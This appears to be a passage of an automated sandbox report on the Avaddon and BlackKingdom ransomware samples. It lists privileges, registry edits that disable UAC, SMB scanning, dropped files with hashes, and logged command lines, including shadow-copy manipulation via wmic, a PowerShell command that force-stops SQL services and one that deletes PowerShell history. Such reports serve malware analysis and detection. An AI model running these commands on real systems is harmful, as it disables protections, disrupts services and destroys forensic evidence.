Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe"

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 api.myip.com udp
US 104.26.8.59:443 api.myip.com tcp
US 8.8.8.8:53 59.8.26.104.in-addr.arpa udp
US 8.8.8.8:53 x2.c.lencr.org udp
GB 184.25.193.61:80 x2.c.lencr.org tcp
US 8.8.8.8:53 61.193.25.184.in-addr.arpa udp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.1:139 tcp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 20.58.20.217.in-addr.arpa udp
N/A 10.127.0.2:445 tcp
N/A 10.127.0.2:139 tcp
US 8.8.8.8:53 2.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.3:139 tcp
US 8.8.8.8:53 3.0.127.10.in-addr.arpa udp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.4:139 tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 4.0.127.10.in-addr.arpa udp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.5:139 tcp
US 8.8.8.8:53 5.0.127.10.in-addr.arpa udp

Files

C:\Users\Admin\Desktop\824656-readme.html

MD5 715d19e9efd5d8de2c5a675267effd80
SHA1 fad8c3aa6cfce316a80aff7897f27d544a2ff258
SHA256 bc62b2f8428f32999b84129990e1d9536b8d52123e0510792f7bff397f73f068
SHA512 2848575fb3ebc73eb42c2e0bbd108bd7e752850bc98fe44a05dad92c72633c35481e37c27e8567ba75f96c4c5e094110f87657318bc13c32e2abf20d704cef07

Analysis: behavioral10

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:42

Platform

win10v2004-20240709-en

Max time kernel

151s

Max time network

159s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description Indicator Process Target
File created C:\Users\Admin\3D Objects\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\AccountPictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created F:\$RECYCLE.BIN\S-1-5-21-47134698-4092160662-1261813102-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\$Recycle.Bin\S-1-5-21-47134698-4092160662-1261813102-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A
File created C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3248 wrote to memory of 608 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe
PID 608 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe C:\Windows\system32\cmd.exe
PID 2548 wrote to memory of 2260 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 608 wrote to memory of 1200 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe C:\Windows\system32\cmd.exe
PID 1200 wrote to memory of 2296 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe"

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackKingdom_23_03_2021_12460KB.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell Get-Service *sql*|Stop-Service -Force 2>$null

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Service *sql*

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell rm (Get-PSReadlineOption).HistorySavePath

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell rm (Get-PSReadlineOption).HistorySavePath

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 240.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 mega.io udp
LU 66.203.124.37:80 mega.io tcp
LU 66.203.124.37:443 mega.io tcp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 g.api.mega.co.nz udp
LU 66.203.125.16:443 g.api.mega.co.nz tcp
US 8.8.8.8:53 37.124.203.66.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 16.125.203.66.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 37.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI32482\ucrtbase.dll

MD5 298e85be72551d0cdd9ed650587cfdc6
SHA1 5a82bcc324fb28a5147b4e879b937fb8a56b760c
SHA256 eb89af5911a60d892a685181c397d32b72c61dc2ad77dd45b8cac0fbb7602b84
SHA512 3fafea5ff0d0b4e07f6354c37b367ada4da1b607186690c732364518a93c3fd2f5004014c9c3d23dde28db87d1cb9ae1259cda68b9ba757db59a59d387ac4e02

C:\Users\Admin\AppData\Local\Temp\_MEI32482\python37.dll

MD5 c4709f84e6cf6e082b80c80b87abe551
SHA1 c0c55b229722f7f2010d34e26857df640182f796
SHA256 ca8e39f2b1d277b0a24a43b5b8eada5baf2de97488f7ef2484014df6e270b3f3
SHA512 e04a5832b9f2e1e53ba096e011367d46e6710389967fa7014a0e2d4a6ce6fc8d09d0ce20cee7e7d67d5057d37854eddab48bef7df1767f2ec3a4ab91475b7ce4

C:\Users\Admin\AppData\Local\Temp\_MEI32482\VCRUNTIME140.dll

MD5 89a24c66e7a522f1e0016b1d0b4316dc
SHA1 5340dd64cfe26e3d5f68f7ed344c4fd96fbd0d42
SHA256 3096cafb6a21b6d28cf4fe2dd85814f599412c0fe1ef090dd08d1c03affe9ab6
SHA512 e88e0459744a950829cd508a93e2ef0061293ab32facd9d8951686cbe271b34460efd159fd8ec4aa96ff8a629741006458b166e5cff21f35d049ad059bc56a1a

C:\Users\Admin\AppData\Local\Temp\_MEI32482\base_library.zip

MD5 a70f10b994f5b2e03777b4d355eef788
SHA1 141be3cef837cf6120f71c714259d9799586b483
SHA256 766089d80d0136ce9a4f24f1dd717a8575b0075c5d9c3c72b84807e0647ffa2c
SHA512 5651e26f0a3de35e455977d3cfc06e2b38defe5e52656e3213177a0a621eca3b3391bf414371cecf88d9ff903747231092b8d1d2206d5f020e1c438c70d8eb38

C:\Users\Admin\AppData\Local\Temp\_MEI32482\_ctypes.pyd

MD5 5e869eebb6169ce66225eb6725d5be4a
SHA1 747887da0d7ab152e1d54608c430e78192d5a788
SHA256 430f1886caf059f05cde6eb2e8d96feb25982749a151231e471e4b8d7f54f173
SHA512 feb6888bb61e271b1670317435ee8653dedd559263788fbf9a7766bc952defd7a43e7c3d9f539673c262abedd97b0c4dd707f0f5339b1c1570db4e25da804a16

C:\Users\Admin\AppData\Local\Temp\_MEI32482\_socket.pyd

MD5 8ea18d0eeae9044c278d2ea7a1dbae36
SHA1 de210842da8cb1cb14318789575d65117d14e728
SHA256 9822c258a9d25062e51eafc45d62ed19722e0450a212668f6737eb3bfe3a41c2
SHA512 d275ce71d422cfaacef1220dc1f35afba14b38a205623e3652766db11621b2a1d80c5d0fb0a7df19402ebe48603e76b8f8852f6cbff95a181d33e797476029f0

C:\Users\Admin\AppData\Local\Temp\_MEI32482\select.pyd

MD5 fb4a0d7abaeaa76676846ad0f08fefa5
SHA1 755fd998215511506edd2c5c52807b46ca9393b2
SHA256 65a3c8806d456e9df2211051ed808a087a96c94d38e23d43121ac120b4d36429
SHA512 f5b3557f823ee4c662f2c9b7ecc5497934712e046aa8ae8e625f41756beb5e524227355316f9145bfabb89b0f6f93a1f37fa94751a66c344c38ce449e879d35f

C:\Users\Admin\AppData\Local\Temp\_MEI32482\pywintypes37.dll

MD5 77b6875977e77c4619bbb471d5eaf790
SHA1 f08c3bc5e918c0a197fbfd1b15e7c0491bd5fade
SHA256 780a72ba3215ff413d5a9e98861d8bb87c15c43a75bb81dc985034ae7dcf5ef6
SHA512 783939fc97b2445dfe7e21eb6b71711aba6d85e275e489eddcc4f20c2ed018678d8d14c9e1856f66e3876f318312d69c22cee77f9105a72e56a1be4f3e8a7c2e

C:\Users\Admin\AppData\Local\Temp\_MEI32482\_ssl.pyd

MD5 5a393bb4f3ae499541356e57a766eb6a
SHA1 908f68f4ea1a754fd31edb662332cf0df238cf9a
SHA256 b6593b3af0e993fd5043a7eab327409f4bf8cdcd8336aca97dbe6325aefdb047
SHA512 958584fd4efaa5dd301cbcecbfc8927f9d2caec9e2826b2af9257c5eefb4b0b81dbbadbd3c1d867f56705c854284666f98d428dc2377ccc49f8e1f9bbbed158f

C:\Users\Admin\AppData\Local\Temp\_MEI32482\libssl-1_1.dll

MD5 bc778f33480148efa5d62b2ec85aaa7d
SHA1 b1ec87cbd8bc4398c6ebb26549961c8aab53d855
SHA256 9d4cf1c03629f92662fc8d7e3f1094a7fc93cb41634994464b853df8036af843
SHA512 80c1dd9d0179e6cc5f33eb62d05576a350af78b5170bfdf2ecda16f1d8c3c2d0e991a5534a113361ae62079fb165fff2344efd1b43031f1a7bfda696552ee173

C:\Users\Admin\AppData\Local\Temp\_MEI32482\libcrypto-1_1.dll

MD5 cc4cbf715966cdcad95a1e6c95592b3d
SHA1 d5873fea9c084bcc753d1c93b2d0716257bea7c3
SHA256 594303e2ce6a4a02439054c84592791bf4ab0b7c12e9bbdb4b040e27251521f1
SHA512 3b5af9fbbc915d172648c2b0b513b5d2151f940ccf54c23148cd303e6660395f180981b148202bef76f5209acc53b8953b1cb067546f90389a6aa300c1fbe477

C:\Users\Admin\AppData\Local\Temp\_MEI32482\_hashlib.pyd

MD5 b32cb9615a9bada55e8f20dcea2fbf48
SHA1 a9c6e2d44b07b31c898a6d83b7093bf90915062d
SHA256 ca4f433a68c3921526f31f46d8a45709b946bbd40f04a4cfc6c245cb9ee0eab5
SHA512 5c583292de2ba33a3fc1129dfb4e2429ff2a30eeaf9c0bcff6cca487921f0ca02c3002b24353832504c3eec96a7b2c507f455b18717bcd11b239bbbbd79fadbe

C:\Users\Admin\AppData\Local\Temp\_MEI32482\_tkinter.pyd

MD5 09f66528018ffef916899845d6632307
SHA1 cf9ddad46180ef05a306dcb05fdb6f24912a69ce
SHA256 34d89fe378fc10351d127fb85427449f31595eccf9f5d17760b36709dd1449b9
SHA512 ed406792d8a533db71bd71859edbb2c69a828937757afec1a83fd1eacb1e5e6ec9afe3aa5e796fa1f518578f6d64ff19d64f64c9601760b7600a383efe82b3de

C:\Users\Admin\AppData\Local\Temp\_MEI32482\tcl86t.dll

MD5 c0b23815701dbae2a359cb8adb9ae730
SHA1 5be6736b645ed12e97b9462b77e5a43482673d90
SHA256 f650d6bc321bcda3fc3ac3dec3ac4e473fb0b7b68b6c948581bcfc54653e6768
SHA512 ed60384e95be8ea5930994db8527168f78573f8a277f8d21c089f0018cd3b9906da764ed6fcc1bd4efad009557645e206fbb4e5baef9ab4b2e3c8bb5c3b5d725

C:\Users\Admin\AppData\Local\Temp\_MEI32482\tcl\encoding\cp1252.enc

MD5 5900f51fd8b5ff75e65594eb7dd50533
SHA1 2e21300e0bc8a847d0423671b08d3c65761ee172
SHA256 14df3ae30e81e7620be6bbb7a9e42083af1ae04d94cf1203565f8a3c0542ace0
SHA512 ea0455ff4cd5c0d4afb5e79b671565c2aede2857d534e1371f0c10c299c74cb4ad113d56025f58b8ae9e88e2862f0864a4836fed236f5730360b2223fde479dc

C:\Users\Admin\AppData\Local\Temp\_MEI32482\tk86t.dll

MD5 fdc8a5d96f9576bd70aa1cadc2f21748
SHA1 bae145525a18ce7e5bc69c5f43c6044de7b6e004
SHA256 1a6d0871be2fa7153de22be008a20a5257b721657e6d4b24da8b1f940345d0d5
SHA512 816ada61c1fd941d10e6bb4350baa77f520e2476058249b269802be826bab294a9c18edc5d590f5ed6f8dafed502ab7ffb29db2f44292cb5bedf2f5fa609f49c

C:\Users\Admin\AppData\Local\Temp\_MEI32482\_bz2.pyd

MD5 cf77513525fc652bad6c7f85e192e94b
SHA1 23ec3bb9cdc356500ec192cac16906864d5e9a81
SHA256 8bce02e8d44003c5301608b1722f7e26aada2a03d731fa92a48c124db40e2e41
SHA512 dbc1ba8794ce2d027145c78b7e1fc842ffbabb090abf9c29044657bdecd44396014b4f7c2b896de18aad6cfa113a4841a9ca567e501a6247832b205fe39584a9

C:\Users\Admin\AppData\Local\Temp\_MEI32482\_queue.pyd

MD5 c0a70188685e44e73576e3cd63fc1f68
SHA1 36f88ca5c1dda929b932d656368515e851aeb175
SHA256 e499824d58570c3130ba8ef1ac2d503e71f916c634b2708cc22e95c223f83d0a
SHA512 b9168bf1b98da4a9dfd7b1b040e1214fd69e8dfc2019774890291703ab48075c791cc27af5d735220bd25c47643f098820563dc537748471765aff164b00a4aa

C:\Users\Admin\AppData\Local\Temp\_MEI32482\_lzma.pyd

MD5 5fbb728a3b3abbdd830033586183a206
SHA1 066fde2fa80485c4f22e0552a4d433584d672a54
SHA256 f9bc6036d9e4d57d08848418367743fb608434c04434ab07da9dabe4725f9a9b
SHA512 31e7c9fe9d8680378f8e3ea4473461ba830df2d80a3e24e5d02a106128d048430e5d5558c0b99ec51c3d1892c76e4baa14d63d1ec1fc6b1728858aa2a255b2fb

C:\Users\Admin\AppData\Local\Temp\_MEI32482\_cpyHook.cp37-win_amd64.pyd

MD5 3271deb52590ba75eadbd732e859ea51
SHA1 a001ed3664f9fb87a6b52411438157f4619f50fd
SHA256 dc80b2f6122ff5f6b8bb37068f602809e9d4e54eaed70b6ae5b22901c83b3993
SHA512 472d9dc42cceb0c569b8f40c3a9d5844dd131bad02e206f7f4fbdc48c6c109f770bd3a69af6d37482d2cea1a23bad58b1c1642caf905df056668127dc1c2adf8

C:\Users\Admin\AppData\Local\Temp\_MEI32482\Crypto\Cipher\_raw_ecb.cp37-win_amd64.pyd

MD5 ea90e3f80b3f3d089e20514e52cae4bb
SHA1 2bd4a5e1b0871ef7ca753b635101216422260eee
SHA256 256f905da0b889b74dcc0ed69a090f26b92e82936e1b149ed1c6d413b45eff96
SHA512 8a8715842b1773386aa75a4eb7136cb8c43da3330e54eddf952469e165c59fe8ce3ed439db6b89e24d1640cec3c64ca2bb3d673727d6a90e9cbd161602d7692c

C:\Users\Admin\AppData\Local\Temp\_MEI32482\Crypto\Cipher\_raw_ofb.cp37-win_amd64.pyd

MD5 22d65fdceebad51d277a2d8db999b237
SHA1 f65ed91b8bab5c2766f4aeaa86580de0017770ad
SHA256 3a4a5aaaa9a80180601376412180b024dbd43c1a3c313dc408dcdd5ee208cd6a
SHA512 d574e7ba77d4bcea014742678608ce46b51b585a6cc8b6e2a2c064b426042c769083f5a74cebe00800283e6efc8f7b079ef0720c2a7bf51098b5f51978419dc9

C:\Users\Admin\AppData\Local\Temp\_MEI32482\Crypto\Util\_strxor.cp37-win_amd64.pyd

MD5 7d2ed7ed7b5f765f13123a905abdd190
SHA1 6c99d801d39c13f86352762d3c150f0c4ff2918b
SHA256 0dcbf6c5d564b77d40cc71096769ab89092b946dd8ebde2a0effb0c28b36ef3a
SHA512 9d5f307ae558ba62abc2b44b8dd3205a7a7c7524253662ba6f427288695aa41e02ac28785ab77b95a0961bff8b5860fd5b20b54438b280bf9f6cb2523dcedac6

C:\Users\Admin\AppData\Local\Temp\_MEI32482\Crypto\Hash\_SHA1.cp37-win_amd64.pyd

MD5 609daa8ccbefeda1291d663235c257eb
SHA1 3a7232f1f6c6b1c03963316c45b7ae335fd9ede6
SHA256 28cca9038d7f709a8cc251cc664195c68f65d61832547459fb8b3021044fe6da
SHA512 028a198e5c8b2f2f7bf8df716a06b5ffae0a875a9ac4d42c1bc64e4232e1d0700f79a01485a87c8fa7515e7c458912ef89487f4aea77fd769bd32e02ce3b1c64

C:\Users\Admin\AppData\Local\Temp\_MEI32482\Crypto\Hash\_SHA256.cp37-win_amd64.pyd

MD5 fd2bab04dcf785080fd7e6aa1abdb566
SHA1 9eece186b95a4a6ffa8fadca283ebd2e1f60a340
SHA256 a660650ba2a0914d510d931458bf93a2e2479cf5922bd830f55ff74deebb19c9
SHA512 5ba2a7e097506c18c5ac74c0adac276b137b04185286fc7f2151dc7e7628c044a99d062b123c56dcf2d409dea1b9a5624a08899f5b7735a233f465317e8cfac5

C:\Users\Admin\AppData\Local\Temp\_MEI32482\Crypto\Hash\_MD5.cp37-win_amd64.pyd

MD5 9172a2fc5c66fff01f12676d16d8e882
SHA1 ee71eafd922f0ee24f1559c63dd8c82b16dbba00
SHA256 1143956ef572524ca0a4db6e55b918d7e3e137fa87d15df31ae4f8a4d5c6334b
SHA512 8a70a90edbac647d04444e5c926d7619d200632192e978fb56f9597583d3cd4ed8dcb5a0db89f0d3f89a41157388d51a3ab3eca7bc19d37da6917ca954ee0741

C:\Users\Admin\AppData\Local\Temp\_MEI32482\Crypto\Cipher\_Salsa20.cp37-win_amd64.pyd

MD5 2b6eac8d1d5cd08279f4c711f84e3953
SHA1 c1b44d08dcf6fe7f50a1707d91f606b70538ce62
SHA256 a05ffcf7b30d87021f67dc94324f4e7e0481809b07f59cbc77b6798aeb319e7b
SHA512 827215a6894c20e9dde798a660ba49f5810d48d50f75cbbe88607254dbd5bad9518c612f1a06fdd932e3836e928ef9f04df7ce4800614e09ca74fffc0070b86d

C:\Users\Admin\AppData\Local\Temp\_MEI32482\Crypto\Hash\_BLAKE2s.cp37-win_amd64.pyd

MD5 f79a4c8843675e13fc0d4f057faec76a
SHA1 80f8d466d2a42a3b278db0f6edb7e60c2f5afa26
SHA256 e4f57da1c2ae72d2ab4980a2ffa370ac0cf1f3f8c76273dcea3c28fd5c858c1e
SHA512 7955edd12c426599c5103fc71d4fa051092584e5bf6755beee5bbb76977927093ec6b73eaec0276de6e3e28e4f3e1ca0507d1b4a85eeba14f2e5b6032401715d

C:\Users\Admin\AppData\Local\Temp\_MEI32482\Crypto\Cipher\_raw_ctr.cp37-win_amd64.pyd

MD5 d02012848d57be3b3967d379ea42426e
SHA1 69610f7f1f35830639cdcf74f99a20be5bb011c7
SHA256 cc1782f000f855b66ff94ddbb34dae3aa520c3fbb98b972c5561f2745791849d
SHA512 51f2dbc9f74b9190fa1f395cac5e8e1b60ac3181da169477e7510411700d42bdcf426285cce8a09983eaa84597621c892d5dc360c56231031e2fc702cddd1be1

C:\Users\Admin\AppData\Local\Temp\_MEI32482\Crypto\Cipher\_raw_cfb.cp37-win_amd64.pyd

MD5 00afcb334aa9cbc635ffb7864d487bca
SHA1 9b0c29dc4c01984ef63d2b868b7d27637aeabde2
SHA256 69e5945cde019e9dcdc23404e81fcc7dd2313eebf259daa3a5af537eaf418267
SHA512 ef1b73b5906713f9b90afc41c60a29d45a1630a6ab1c22be1cc7aa72dc5db7b7bc90dfce1eefda9167a98e911952f7232c5c0f1c4e043428d292cf64fbae284b

C:\Users\Admin\AppData\Local\Temp\_MEI32482\Crypto\Cipher\_raw_cbc.cp37-win_amd64.pyd

MD5 b768eda0fa972c9cd34cebc1e7c4b54e
SHA1 95967222a6902226e9bc94bc1503c1638fbcc7cc
SHA256 4e872e1aa9229a3e95a970af1b6a71c17c5ab84e53a57012c5c7c4412fafeb3f
SHA512 fcf4de7f5be68bb029cd5f6a6413ce3fc1db0ea3d58152b766f86ae1c81653ac9c1b303b8622bb2a34b254f1b9f33e8422b42642992936512d80f435e5229690

C:\Users\Admin\AppData\Local\Temp\_MEI32482\unicodedata.pyd

MD5 4d3d8e16e98558ff9dac8fc7061e2759
SHA1 c918ab67b580f955b6361f9900930da38cec7c91
SHA256 016d962782beae0ea8417a17e67956b27610f4565cff71dd35a6e52ab187c095
SHA512 0dfabfad969da806bc9c6c664cdf31647d89951832ff7e4e5eeed81f1de9263ed71bddeff76ebb8e47d6248ad4f832cb8ad456f11e401c3481674bd60283991a

C:\Users\Admin\AppData\Local\Temp\_MEI32482\certifi\cacert.pem

MD5 1ba3b44f73a6b25711063ea5232f4883
SHA1 1b1a84804f896b7085924f8bf0431721f3b5bdbe
SHA256 bb77f13d3fbec9e98bbf28ac95046b44196c7d8f55ab7720061e99991a829197
SHA512 0dd2a14331308b1de757d56fab43678431e0ad6f5f5b12c32fa515d142bd955f8be690b724e07f41951dd03c9fee00e604f4e0b9309da3ea438c8e9b56ca581b

C:\Users\Admin\AppData\Local\Temp\_MEI32482\tcl\init.tcl

MD5 b900811a252be90c693e5e7ae365869d
SHA1 345752c46f7e8e67dadef7f6fd514bed4b708fc5
SHA256 bc492b19308bc011cfcd321f1e6e65e6239d4eeb620cc02f7e9bf89002511d4a
SHA512 36b8cdba61b9222f65b055c0c513801f3278a3851912215658bcf0ce10f80197c1f12a5ca3054d8604da005ce08da8dcd303b8544706b642140a49c4377dd6ce

memory/2296-1095-0x00007FFDB6143000-0x00007FFDB6145000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o3vqugbp.qkt.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2296-1105-0x00000200763C0000-0x00000200763E2000-memory.dmp

memory/2296-1106-0x0000020076A90000-0x0000020076AD4000-memory.dmp

